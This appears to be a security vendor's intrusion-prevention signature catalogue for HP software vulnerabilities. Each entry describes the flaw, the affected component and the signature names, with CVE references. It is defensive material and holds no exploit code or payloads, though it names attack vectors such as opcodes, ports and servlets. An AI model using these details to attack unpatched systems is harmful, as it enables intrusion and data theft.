Risk: Moderate
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Input Validation
Description: There is an SQL injection vulnerability in HP Data Protector Notebook Extension and HP Data Protector for Personal Computers. The specific flaw is caused by insufficient validation of the type field in a user supplied SOAP request to the DPNECentral web service. A remote unauthenticated attacker can leverage this vulnerability to execute arbitrary SQL queries on a target system within the security context of the affected service.
Situation: HTTP_CS-HP-Data-Protector-Multiple-Products-Requestcopy-SQL-Injection
References:
CVE-2011-3158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3158
OSVDB-76703
http://www.osvdb.org/76703
Back to top

HP-Data-Protector-Omniinet-Service-Null-Dereference-Denial-Of-Service

About this vulnerability: A vulnerability in HP Data Protector Media Operations
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector Media Operations
Type: Malfunction
Description: A denial of service vulnerability exists in HP Data Protector OmniInet Service. The flaw is due to a NULL pointer dereference error in OmniInet Service when parsing malformed requests. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the target server. Successful exploitation will cause the target service to terminate abnormally resulting in a denial of service condition.
Situation: Generic_CS-HP-Data-Protector-Omniinet-Service-Null-Dereference-Denial-Of-Service
Back to top

HP-Data-Protector-Opcode-1091-Directory-Traversal

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Directory Traversal
Description: A directory traversal vulnerability exists in HP Data Protector. The vulnerability is due to a lack of input sanitization on a file name provided with Opcode 1091. The file name is not sanitized for directory traversal characters, allowing an attacker to create arbitrary files. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation could cause the writing of arbitrary files to the file system which could result in code execution in the context of the the affected service, which is SYSTEM by default.
Situation: Generic_CS-HP-Data-Protector-Opcode-1091-Directory-Traversal
References:
CVE-2014-5160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5160
OSVDB-109495
http://www.osvdb.org/109495
Back to top

HP-Data-Protector-Opcode-27-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in HP Data Protector. The vulnerability is due to a lack of input sanitization on Strings provided with Opcode 27. The strings are not validated for length before being copied into a fixed-size stack buffer. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation could cause a stack buffer overflow resulting in code execution in the context of the the affected service, which is SYSTEM by default.
Situation: Generic_CS-HP-Data-Protector-Opcode-27-Stack-Buffer-Overflow
Back to top

HP-Data-Protector-Opcode-28-And-11-Command-Execution

About this vulnerability: A vulnerability in HP Data Protector
Risk: High
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Malfunction
Description: An command execution vulnerability exists in Hewlett-Packard Data Protector. The vulnerability is due to the a design weakness when handling requests to port 5555. A remote attacker can exploit this vulnerability by sending crafted packets to the target service. Successful exploitation could lead to arbitrary command execution with System privileges on the target server.
Situation: Generic_CS-HP-Data-Protector-Opcode-28-And-11-Command-Execution-2
Generic_CS-HP-Data-Protector-Opcode-28-And-11-Command-Execution
References:
CVE-2014-2623
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2623
BID-68672
http://www.securityfocus.com/bid/68672
OSVDB-109069
http://www.osvdb.org/109069
Back to top

HP-Data-Protector-Opcode-305-Directory-Traversal

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Directory Traversal
Description: A directory traversal vulnerability exists in HP Data Protector. The vulnerability is due to a lack of input sanitization of a file name provided with Opcode 305. The file name is not sanitized for directory traversal characters, allowing an attacker to delete or create arbitrary files. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation would result in the of writing arbitrary files to the file system which could result in code execution in the context of the affected service, which is Administrator by default.
Situation: Generic_CS-HP-Data-Protector-Opcode-305-Directory-Traversal
References:
CVE-2014-5160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5160
BID-68855
http://www.securityfocus.com/bid/68855
OSVDB-109494
http://www.osvdb.org/109494
Back to top

HP-Data-Protector-Opcode-42-Directory-Traversal

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Directory Traversal
Description: A directory traversal vulnerability exists in HP Data Protector. The vulnerability is due to a lack of input sanitization on a file name provided with Opcode 42. The file name is not sanitized for directory traversal characters, allowing an attacker to write arbitrary content to the file system. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation could cause writing arbitrary files to the file system which could result in code execution in the context of the the affected service, which is SYSTEM by default.
Situation: Generic_CS-HP-Data-Protector-Opcode-42-Directory-Traversal
References:
CVE-2013-6194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6194
OSVDB-101630
http://www.osvdb.org/101630
Back to top

HP-Data-Protector-Opcode-45-And-46-Code-Execution

About this vulnerability: A vulnerability in HP Data Protector
Risk: Moderate
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Data Protector
Type: Buffer Overflow
Description: Two vulnerabilities exist in HP Data Protector. Both vulnerabilities are due to insufficient input validation on a string supplied with a message containing opcodes 45 or 46. The length of the string is not validated before being copied into a fixed-size stack buffer, possibly resulting in a stack buffer overflow. Also, the supplied string is not sanitized for directory traversal characters before being used to create a file, resulting in a directory traversal and arbitrary file upload. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation could result in code execution in the context of the the affected service, which is SYSTEM by default.
Situation: Generic_CS-HP-Data-Protector-Opcode-45-And-46-Code-Execution
References:
CVE-2013-2348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2348
OSVDB-101627
http://www.osvdb.org/101627
Back to top

HP-Database-Archiving-Software-Giop-Opcode-0x0e-Buffer-Overflow

About this vulnerability: A vulnerability in HP Database Archiving Software
Risk: High
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Database Archiving Software
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in HP Database Archiving Software. Specifically, the application uses a user-supplied signed value to control a copy operation when processing GIOP packets with Opcode 0x0E. This can lead to a stack-based buffer overflow condition. By sending a crafted packet to the target server, a remote unauthenticated attacker can exploit this vulnerability to execute arbitrary code under the context of the service.
Situation: Generic_CS-HP-Database-Archiving-Software-Giop-Opcode-0x0e-Buffer-Overflow
References:
CVE-2011-4163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4163
BID-51205
http://www.securityfocus.com/bid/51205
OSVDB-78044
http://www.osvdb.org/78044
Back to top

HP-Database-Archiving-Software-Giop-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in HP Database Archiving Software
Risk: Moderate
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Database Archiving Software
Type: Buffer Overflow
Description: An attempt to exploit a vulnerability in HP Database Archiving Software detected
Situation: Generic_CS-HP-Database-Archiving-Software-Giop-Parsing-Buffer-Overflow
References:
CVE-2011-4164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4164
BID-51205
http://www.securityfocus.com/bid/51205
OSVDB-78045
http://www.osvdb.org/78045
Back to top

HP-Diagnostics-Server-Buffer-Overflow

About this vulnerability: An HP Diagnostics Server Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LoadRunner
Type: Buffer Overflow
Description: A buffer overflow vulnerability in HP LoadRunner, versions 11.00 before patch 4, which allows remote attackers to execute arbitrary code via a crafted size value.
Situation: Generic_CS-HP-Diagnostics-Server-Buffer-Overflow
References:
CVE-2011-4789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4789
OSVDB-72815
http://www.osvdb.org/72815
Back to top

HP-Easy-Printer-Care-ActiveX-Control-Directory-Traversal

About this vulnerability: A vulnerability in HP Easy Printer Care
Risk: Moderate
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Easy Printer Care Software
Type: Directory Traversal
Description: A directory traversal vulnerability has been discovered in the XMLCacheMgr class ActiveX control, which is a component of HP Easy Printer Care. The vulnerability can be triggered by passing malicious parameters to the CacheDocumentXMLWithId() method. A remote attacker could exploit this vulnerability by enticing a target user to visit a malicious web page. A successful attack would result in execution of arbitrary attacker code in the security context of the current user running the browser.
Situation: File-Text_HP-Easy-Printer-Care-ActiveX-Control-Directory-Traversal
References:
CVE-2011-4786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4786
OSVDB-78306
http://www.osvdb.org/78306
Back to top

HP-Easy-Printer-Care-Software-ActiveX-Control-Directory-Traversal

About this vulnerability: A vulnerability in HP Easy Printer Care Software
Risk: Moderate
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Easy Printer Care Software
Type: Input Validation
Description: A directory traversal vulnerability has been identified in HP's Easy Printer Care Software. The vulnerability is due to insufficient input validation by an ActiveX control, which is part of the affected product. A remote attacker could exploit this vulnerability by enticing a target user to view a maliciously crafted web page. This would allow the attacker to overwrite arbitrary files on the target computer with arbitrary content, which could lead to code execution.
Situation: File-Text_HP-Easy-Printer-Care-Software-ActiveX-Control-Directory-Traversal
References:
CVE-2011-2404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2404
BID-49100
http://www.securityfocus.com/bid/49100
OSVDB-74510
http://www.osvdb.org/74510
Back to top

HP-Info-Center-ActiveX-Control-Absolute-Path-Traversal

About this vulnerability: A path traversal vulnerability in HP Info Center ActiveX control
Risk: High
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Info Center
Type: Directory Traversal
Description: There is a vulnerability in the Hewlett-Packard HP Info Center ActiveX control. The vulnerability allows modification of the system registry, which may lead to a system compromise.
Situation: HTTP_SS-HP-Info-Center-ActiveX-Control-Absolute-Path-Traversal
File-Text_HP-Info-Center-ActiveX-Control-Absolute-Path-Traversal
References:
CVE-2007-6331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6331
BID-26823
http://www.securityfocus.com/bid/26823
Back to top

HP-Info-Center-ActiveX-Control-Registry-Get

About this vulnerability: A vulnerability in HP Info Center ActiveX control
Risk: Low
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Info Center
Type: Malfunction
Description: There is a vulnerability in the Hewlett-Packard HP Info Center ActiveX control. The vulnerability allows reading of the system registry, which may reveal critical system configuration information.
Situation: HTTP_SS-HP-Info-Center-ActiveX-Control-Registry-Access
File-Text_HP-Info-Center-ActiveX-Control-Registry-Access
References:
CVE-2007-6333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6333
BID-26823
http://www.securityfocus.com/bid/26823
Back to top

HP-Info-Center-ActiveX-Control-Registry-Set

About this vulnerability: A vulnerability in HP Info Center ActiveX control
Risk: Low
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Info Center
Type: Malfunction
Description: There is a vulnerability in Hewlett-Packard HP Info Center ActiveX control. The vulnerability allows modification of the system registry, which may lead to a system compromise.
Situation: HTTP_SS-HP-Info-Center-ActiveX-Control-Registry-Access
File-Text_HP-Info-Center-ActiveX-Control-Registry-Access
References:
CVE-2007-6332
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6332
BID-26823
http://www.securityfocus.com/bid/26823
Back to top

HP-Info-Center-HPInfo-Class-ActiveX-Control-Insecure-Methods

About this vulnerability: HP Info Center HPInfo Class ActiveX Control Insecure Methods
Risk: Low
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP Info Center
Type: Malfunction
Description: Vulnerable ActiveX control methods in HP Info Center allow remote attackers to execute arbitrary commands on a vulnerable machine.
Situation: File-Text_HP-Info-Center-HPInfo-Class-ActiveX-Control-Insecure-Methods
Back to top

HP-Intelligent-Management-Center-BIMS-Uploadservlet-Arbitrary-File-Upload

About this vulnerability: A vulnerability in HP IMC Branch Intelligent Management System Software Module (BIMS)
Risk: Moderate
First detected in: sgpkg-ips-547-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP IMC Branch Intelligent Management System Software Module
Type: Malfunction
Description: There is a code execution vulnerability exists in the Branch Intelligent Management Software (BIMS) module of Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the UploadServlet when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CRL-HP-Intelligent-Management-Center-BIMS-Uploadservlet-Arbitrary-File-Upload
References:
CVE-2013-4822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4822
OSVDB-98247
http://www.osvdb.org/98247
Back to top

HP-Intelligent-Management-Center-BIMS-Uploadservlet-Information-Disclosure

About this vulnerability: A vulnerability in HP IMC Branch Intelligent Management System Software Module (BIMS)
Risk: High
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1640-5242
Platform: Generic
Software: HP IMC Branch Intelligent Management System Software Module
Type: Directory Traversal
Description: An information disclosure vulnerability exists in the BIMS add-in module of HP Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the UploadServlet servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.
Situation: HTTP_CSU-Path-Traversal-Sequence-In-File-Name
References:
CVE-2014-2618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2618
BID-68540
http://www.securityfocus.com/bid/68540
OSVDB-109168
http://www.osvdb.org/109168
Back to top

HP-Intelligent-Management-Center-Bimsdownload-Information-Disclosure

About this vulnerability: A vulnerability in HP IMC Branch Intelligent Management System Software Module (BIMS)
Risk: Moderate
First detected in: sgpkg-ips-546-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Directory Traversal
Description: There is an information disclosure vulnerability in the BIMS add-in module of HP Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the bimsDownload servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.
Situation: HTTP_CSU-HP-Intelligent-Management-Center-Bimsdownload-Information-Disclosure
References:
CVE-2013-4823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4823
OSVDB-98248
http://www.osvdb.org/98248
Back to top

HP-Intelligent-Management-Center-Buffer-Overflow

About this vulnerability: HP Intelligent Management Center Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability exists in HP iNode Management Center, 5.1 SP1 and before, when handling message types 0x0a0af007, which is due to insufficient boundary checking.
Situation: Generic_CS-HP-Intelligent-Management-Center-Buffer-Overflow
References:
BID-55160
http://www.securityfocus.com/bid/55160
Back to top

HP-Intelligent-Management-Center-Database-Information-Disclosure

About this vulnerability: Policy bypass vulnerability in HP Intelligent Management Center
Risk: High
First detected in: sgpkg-ips-314-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: HP Intelligent Management Center
Type: Malfunction
Description: There is a policy bypass vulnerability in HP Intelligent Management Center. A remote attacker can send an HTTP GET request to the target server to retrieve login credentials to the database server.
Situation: HTTP_CSU-HP-Intelligent-Management-Center-Database-Information-Disclosure
References:
BID-40298
http://www.securityfocus.com/bid/40298
Back to top

HP-Intelligent-Management-Center-Dbman-Buffer-Overflow

About this vulnerability: An attempt to exploit vulnerability in HP Intelligent Management Center service detected
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HP Intelligent Management Center
Type: Malfunction
Description: A buffer overflow vulnerability has been identified in the dbman component of the HP Intelligent Management Center. While processing packets sent to port 2810/UDP, user-supplied data is copied to a stack buffer by calling the sprintf function without performing a boundary check.
Situation: Generic_UDP-HP-Intelligent-Management-Center-Dbman-Buffer-Overflow
References:
CVE-2011-1850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1850
BID-47789
http://www.securityfocus.com/bid/47789
OSVDB-72393
http://www.osvdb.org/72393
Back to top

HP-Intelligent-Management-Center-Downloadservlet-Information-Disclosure

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Directory Traversal
Description: There is an information disclosure vulnerability in HP Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the DownloadServlet servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.
Situation: HTTP_CSU-HP-Intelligent-Management-Center-Downloadservlet-Information-Disclosure
References:
CVE-2012-5208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5208
BID-58385
http://www.securityfocus.com/bid/58385
OSVDB-91033
http://www.osvdb.org/91033
Back to top

HP-Intelligent-Management-Center-Faultdownloadservlet-Information-Disclosure

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Directory Traversal
Description: There is an information disclosure vulnerability in HP Intelligent Management Center. The vulnerability is due to a lack of authentication and insufficient input validation when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the file contents of arbitrary files on a target system.
Situation: HTTP_CSU-HP-IMC-Faultdownloadservlet-Information-Disclosure
References:
CVE-2012-5202
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5202
BID-58385
http://www.securityfocus.com/bid/58385
OSVDB-91027
http://www.osvdb.org/91027
Back to top

HP-Intelligent-Management-Center-Ictdownloadservlet-Information-Disclosure

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Directory Traversal
Description: There is an information disclosure vulnerability in HP Intelligent Management Center. The vulnerability is due to a lack of authentication and insufficient input validation when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the file contents of arbitrary files on a target system.
Situation: HTTP_CSU-HP-IMC-Ictdownloadservlet-Information-Disclosure
References:
CVE-2012-5204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5204
BID-58385
http://www.securityfocus.com/bid/58385
OSVDB-91029
http://www.osvdb.org/91029
Back to top

HP-Intelligent-Management-Center-Imcsyslogdm-Use-After-Free

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Malfunction
Description: A vulnerability has been identified in the imcsyslogdm component of the HP Intelligent Management Center. An exception handler could call into free memory address when handling an overly large syslog packet. By sending a crafted syslog packet to UDP port 514, a remote attacker can exploit this vulnerability to execute arbitrary code under the security context of the SYSTEM user.
Situation: Datalength-UDP_Long-Syslog-Message
References:
CVE-2011-1854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1854
BID-47789
http://www.securityfocus.com/bid/47789
Back to top

HP-Intelligent-Management-Center-Img-Buffer-Overflow

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: High
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Malfunction
Description: A buffer overflow vulnerability has been identified in the img component of the HP Intelligent Management Center. When processing packets sent to port 8800/TCP, user-supplied data is directly copied to a stack buffer without boundary check. By sending a crafted packet to the target, a remote attacker can exploit this vulnerability to execute arbitrary code under the security context of the SYSTEM user.
Situation: Generic_CS-HP-Intelligent-Management-Center-Img-Buffer-Overflow
Generic_CS-HP-Intelligent-Management-Center-Img-Buffer-Overflow-2
References:
CVE-2011-1848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1848
BID-47789
http://www.securityfocus.com/bid/47789
Back to top

HP-Intelligent-Management-Center-Mibfileupload-Servlet-Arbitrary-File-Upload

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: High
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Malfunction
Description: An arbitrary file upload vulnerability exists in HP Intelligent Management Center. The vulnerability is due to the mibFileUpload servlet accepts unauthenticated file uploads and processes zip files in an insecure way. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges.
Situation: File-Member-Name_HP-Intelligent-Management-Center-Mibfileupload-Servlet-Vulnerability
References:
CVE-2012-5201
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5201
BID-58385
http://www.securityfocus.com/bid/58385
OSVDB-91026
http://www.osvdb.org/91026
Back to top

HP-Intelligent-Management-Center-Reportimgservlet-Information-Disclosure

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Directory Traversal
Description: There is an information disclosure vulnerability in HP Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the ReportImgServlet servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the file contents of arbitrary files on a target system.
Situation: HTTP_CSU-HP-Intelligent-Management-Center-Reportimgservlet-Disclosure
References:
CVE-2012-5203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5203
BID-58385
http://www.securityfocus.com/bid/58385
OSVDB-91028
http://www.osvdb.org/91028
Back to top

HP-Intelligent-Management-Center-Reporting-Information-Disclosure

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-318-4219
Last changed: sgpkg-ips-1638-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Input Validation
Description: An information disclosure vulnerability exists in HP Intelligent Management Center. The vulnerability is due to insufficient input validation when processing HTTP request parameters. Using directory traversal characters, a remote unauthenticated attacker can leverage this vulnerability to view the file contents of arbitrary files on a target system. The target will not exhibit any unusual behaviour as a result of this attack. A successful attack will allow the a ttacker to gain access to restricted files. This may lead to disclosure of sensitive information.
Situation: HTTP_CSU-Path-Traversal-Sequence-In-File-Name
References:
BID-40298
http://www.securityfocus.com/bid/40298
Back to top

HP-Intelligent-Management-Center-Sdfiledownload-Information-Disclosure

About this vulnerability: A vulnerability in HP IMC Service Operation Management Software Module
Risk: Moderate
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-1831-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Directory Traversal
Description: An information disclosure vulnerability exists in the SOM add-in module of HP Intelligent Management Center. The vulnerability is due to a lack of authentication and insufficient input validation in the sdFileDownload servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.
Situation: HTTP_CSU-HP-Intelligent-Management-Center-Sdfiledownload-Information-Disclosure
References:
CVE-2013-4826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4826
BID-62898
http://www.securityfocus.com/bid/62898
OSVDB-98251
http://www.osvdb.org/98251
Back to top

HP-Intelligent-Management-Center-Som-Euaccountserivce-Authentication-Bypass

About this vulnerability: A vulnerability in HP IMC Service Operation Management Software Module
Risk: Moderate
First detected in: sgpkg-ips-551-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Malfunction
Description: There is an authentication bypass vulnerability in the SOM add-in module of HP Intelligent Management Center. The vulnerability is due to a lack of authentication in the euAccountSerivce (sic) servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to create a web administration account on a target system.
Situation: HTTP_CSU-HP-Intelligent-Management-Center-Som-Euaccountserivce-Authentication-Bypass
References:
CVE-2013-4824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4824
OSVDB-98249
http://www.osvdb.org/98249
Back to top

HP-Intelligent-Management-Center-Stack-Based-Buffer-Overflow

About this vulnerability: A HP Intelligent Management Center Stack Based Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2003 SP2
Software: HP Intelligent Management Center UAM
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in HP Intelligent Management Center UAM, versions before 5.1 E0101P01, in uam.exe which allows remote attackers to execute arbitrary code.
Situation: Generic_UDP-HP-Intelligent-Management-Center-Stack-Based-Buffer-Overflow
References:
CVE-2012-3274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3274
BID-55271
http://www.securityfocus.com/bid/55271
OSVDB-85060
http://www.osvdb.org/85060
Back to top

HP-Intelligent-Management-Center-Syslogdownloadservlet-Information-Disclosure

About this vulnerability: A vulnerability in HP Intelligent Management Center
Risk: Moderate
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center
Type: Directory Traversal
Description: There is an information disclosure vulnerability in HP Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the SyslogDownloadServlet servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.
Situation: HTTP_CSU-HP-IMC-Syslogdownloadservlet-Information-Disclosure
References:
CVE-2012-5206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5206
BID-58385
http://www.securityfocus.com/bid/58385
OSVDB-91031
http://www.osvdb.org/91031
Back to top

HP-Intelligent-Management-Center-Uam-Acmservletdownload-Information-Disclosure

About this vulnerability: A vulnerability in HP Intelligent Management Center User Access Manager
Risk: Moderate
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center UAM
Type: Directory Traversal
Description: There is an information disclosure vulnerability in the UAM add-in module of HP Intelligent Management Center. The vulnerability is due to lack of authentication and insufficient input validation in the acmServletDownload servlet when processing HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target system.
Situation: HTTP_CSU-Path-Traversal-Sequence-In-File-Name
References:
CVE-2012-5211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5211
BID-58385
http://www.securityfocus.com/bid/58385
OSVDB-91036
http://www.osvdb.org/91036
Back to top

HP-Intelligent-Management-Center-Uam.exe-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in HP Intelligent Management Center UAM
Risk: High
First detected in: sgpkg-ips-475-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Intelligent Management Center UAM
Type: Buffer Overflow
Description: A stack buffer overflow exists in HP Intelligent Management Center's uam.exe service which listens on port UDP/1811. The vulnerability is due to lack of validation of a string passed to sprintf() when writing to a log file. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted packet to the vulnerable service. Successful exploitation could result in arbitrary code execution in the context of the affected service, which is SYSTEM.
Situation: Generic_UDP-HP-Intelligent-Management-Center-Uam.exe-Stack-Buffer-Overflow
References:
BID-55271
http://www.securityfocus.com/bid/55271
OSVDB-85060
http://www.osvdb.org/85060
Back to top

HP-Lefthand-Virtual-SAN-Appliance-Hydra-Credential-Information-Disclosure

About this vulnerability: A vulnerability in HP LeftHand Virtual SAN Appliance
Risk: Moderate
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP LeftHand Virtual SAN Appliance
Type: Malfunction
Description: There is an information disclosure vulnerability in HP LeftHand Virtual SAN Appliance. The vulnerability is due to a design weakness in the hydra component which listens by default on 13841/tcp. A remote unauthenticated attacker can exploit this vulnerability by sending snapshot requests to the server and reveal the credentials of any existing users on the server. The attacker can also exploit the vulnerability by sniffing the normal traffic communicated between the CMC and the server. Successful exploitation will disclose credentials that could allow the attacker to log in to the server with administrator privileges.
Situation: Generic_CS-HP-Lefthand-Virtual-SAN-Hydra-Credential-Information-Disclosure
References:
CVE-2012-3282
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3282
OSVDB-89918
http://www.osvdb.org/89918
Back to top

